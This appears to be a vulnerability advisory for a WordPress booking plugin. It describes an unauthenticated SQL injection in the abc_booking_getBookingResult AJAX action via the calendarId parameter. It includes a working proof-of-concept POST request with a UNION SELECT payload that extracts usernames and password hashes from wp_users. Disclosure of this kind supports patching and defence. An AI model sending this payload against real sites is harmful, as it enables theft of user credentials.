The AJAX action abc_booking_getBookingResult, available to both authenticated and Unauthenticated users did not sanitise the calendarId parameter which was then concatenated to a SQL statement, leading an unauthenticated SQL injection issue. This could be used to retrieve information from the database, such as users' hashed password, username and email address.
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: example.com Cookie: cache-control: no-cache calendarId=1)+UNION+SELECT+1%2Cuser_login%2C3%2C4%2C5%2C6%2C7%2C2%2Cuser_pass+FROM+wp_users+WHERE+ID%3D1+and+ID+IN+(+1+&from=2010-05-05&to=2010-05-09&action=abc_booking_getBookingResult
Lenon Leite
Lenon Leite
Yes
2020-10-22 (about 2 years ago)
2020-10-22 (about 2 years ago)
2020-10-22 (about 2 years ago)